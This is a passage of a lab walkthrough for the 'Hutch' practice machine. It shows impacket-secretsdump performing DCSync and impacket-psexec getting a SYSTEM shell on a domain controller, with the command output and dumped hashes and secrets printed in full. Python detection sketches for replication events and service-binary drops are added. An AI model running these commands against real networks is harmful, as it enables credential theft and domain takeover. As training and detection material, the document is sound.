DCSync


The TGT of the administrator user has been obtained.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hutch]
└─$ KRB5CCNAME=administrator@hutchdc.hutch.offsec.ccache impacket-secretsdump HUTCH.OFFSEC/@hutchdc.hutch.offsec -no-pass -k -dc-ip $IP 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xb24173e6ac9aa789ab05a4acceeb27ba
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bab179eba40e413086aa37742476c646:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
HUTCH\HUTCHDC$:plain_password_hex:1b393595f43baefa886001e32894303c75f75006ab84ef233e025106c7d57dc9e0c24ab1c808d3a535cb2d2ed2ee4b0b2b61ec203447cecda73bb2bd5411b223fc2df36753a6297fd07d1c2635bffc662a986e1f7fae74d9644b5c91b85da5762ecb1e5428deda72cea479f3e9d52c3d2fe0071132067b65f3010c998f7495063888c8537d6bd689f7060bb6bf332f34ddd8cf50baad25f1187b89b31b9d4f9fea22e2de873c8dffdc9848b82249dfd15f5b5504b2ed26b8c1d3dfd8893c89548aa2c432aa353d8858306c7c9fc48f357c6c0f13c6f48eca60f72281970a5047b839767c59d0814ba88c659821cc275c
HUTCH\HUTCHDC$:aad3b435b51404eeaad3b435b51404ee:80567bd4d1c4f6b30a93098cde4a868d:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xb818f6846ad0c5c47237a32eee5c2c30b0f739c0
dpapi_userkey:0x9c047d0b5fde15f60714f1411579b93a45dd5872
[*] NL$KM 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[*] Kerberos keys grabbed
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

Domain-level compromise
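
Detection side of the DRSUAPI dump above, as an added example that is not part of the original notes: replication by a principal that is not a domain controller shows up in Security event 4662 with the replication control-access GUIDs, and joining on the logon ID to event 4624 gives the requesting host. It assumes directory service access auditing is enabled on the domain root and that events are already parsed into dictionaries; the sample records are constructed.

```python
# Added example (not from the original notes): flag DCSync-style replication.
REPL_RIGHTS = {  # control-access right GUIDs checked for directory replication
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}


def find_dcsync(events, dc_accounts):
    """Alert on each 4662 event where a non-DC account exercised replication rights."""
    allowed = {a.lower() for a in dc_accounts}
    # 4662 carries no network address, so index 4624 logons by LogonId for the join.
    logons = {e.get("TargetLogonId"): e for e in events if e.get("EventID") == 4624}
    alerts = []
    for e in events:
        if e.get("EventID") != 4662:
            continue
        props = e.get("Properties", "").lower()
        rights = sorted(name for guid, name in REPL_RIGHTS.items() if guid in props)
        user = e.get("SubjectUserName", "")
        if not rights or user.lower() in allowed:
            continue
        src = logons.get(e.get("SubjectLogonId"), {}).get("IpAddress", "unknown")
        alerts.append({"user": user, "source_ip": src, "rights": rights})
    return alerts


# Constructed sample records: field names follow the Windows event schema, the
# values (logon IDs, the 192.0.2.10 source address, svc_backup) are invented.
SAMPLE_EVENTS = [
    {"EventID": 4624, "TargetUserName": "Administrator", "LogonType": 3,
     "TargetLogonId": "0x5f3a1c", "IpAddress": "192.0.2.10"},
    {"EventID": 4662, "SubjectUserName": "Administrator", "SubjectLogonId": "0x5f3a1c",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "Administrator", "SubjectLogonId": "0x5f3a1c",
     "Properties": "%%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "HUTCHDC$", "SubjectLogonId": "0x3e7",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "svc_backup", "SubjectLogonId": "0x61aa00",
     "Properties": "%%7684 {bf967aba-0de6-11d0-a285-00aa003049e2}"},
]

if __name__ == "__main__":
    for alert in find_dcsync(SAMPLE_EVENTS, dc_accounts=["HUTCHDC$"]):
        print(alert)
```

The allowlist should hold every domain controller machine account plus any sanctioned replication service account, so that only unexpected principals alert.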

Shelldrop


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hutch]
└─$ KRB5CCNAME=administrator@hutchdc.hutch.offsec.ccache impacket-psexec HUTCH.OFFSEC/@hutchdc.hutch.offsec -no-pass -k -dc-ip $IP      
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Requesting shares on hutchdc.hutch.offsec.....
[*] Found writable share ADMIN$
[*] Uploading file rVOrQqEi.exe
[*] Opening SVCManager on hutchdc.hutch.offsec.....
[*] Creating service mxMx on hutchdc.hutch.offsec.....
[*] Starting service mxMx.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1637]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32> whoami
nt authority\system
 
C:\Windows\system32> hostname
hutchdc
 
C:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::9df9:8e58:4400:9b3a%3
   IPv4 Address. . . . . . . . . . . : 192.168.187.122
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.187.254

System-level compromise
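
What the session above leaves in the logs, as an added example that is not part of the original notes: the service creation is recorded as System event 7045 and, when detailed file share auditing is on, the upload as Security event 5145. The sketch pairs the two by file name, assuming the service ImagePath points at the uploaded file under %systemroot% (the directory ADMIN$ maps to) and that events are already parsed into dictionaries; the sample records are constructed.

```python
import ntpath
import re

# An .exe placed directly in the Windows directory, which is what ADMIN$ exposes.
ADMIN_EXE = re.compile(r"^(%systemroot%|[a-z]:\\windows)\\[^\\]+\.exe$", re.I)
FILE_WRITE_DATA = 0x2  # access-mask bit recorded in event 5145


def find_service_drops(events):
    """Alert on 7045 installs whose binary sits in ADMIN$; add the 5145 writer if logged."""
    writes = {}
    for e in events:
        if (e.get("EventID") == 5145
                and e.get("ShareName", "").upper().endswith("ADMIN$")
                and int(e.get("AccessMask", "0x0"), 16) & FILE_WRITE_DATA):
            writes[e.get("RelativeTargetName", "").lower()] = e
    alerts = []
    for e in events:
        image = e.get("ImagePath", "").strip('"')
        if e.get("EventID") != 7045 or not ADMIN_EXE.match(image):
            continue
        binary = ntpath.basename(image)
        w = writes.get(binary.lower(), {})  # empty when detailed share auditing is off
        alerts.append({"service": e.get("ServiceName"), "binary": binary,
                       "user": w.get("SubjectUserName", "unknown"),
                       "source_ip": w.get("IpAddress", "unknown")})
    return alerts


# Constructed sample records. rVOrQqEi.exe and mxMx come from the session above;
# the field layout follows events 5145/7045 and every other value is invented.
SAMPLE_EVENTS = [
    {"EventID": 5145, "SubjectUserName": "Administrator", "IpAddress": "192.0.2.10",
     "ShareName": r"\\*\ADMIN$", "RelativeTargetName": "rVOrQqEi.exe", "AccessMask": "0x2"},
    {"EventID": 7045, "ServiceName": "mxMx", "AccountName": "LocalSystem",
     "ImagePath": r"%systemroot%\rVOrQqEi.exe"},
    {"EventID": 7045, "ServiceName": "VendorAgent", "AccountName": "LocalSystem",
     "ImagePath": r'"C:\Program Files\Vendor\agent.exe"'},
    {"EventID": 7045, "ServiceName": "ExampleSvc", "AccountName": "LocalSystem",
     "ImagePath": r"C:\Windows\System32\svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for alert in find_service_drops(SAMPLE_EVENTS):
        print(alert)
```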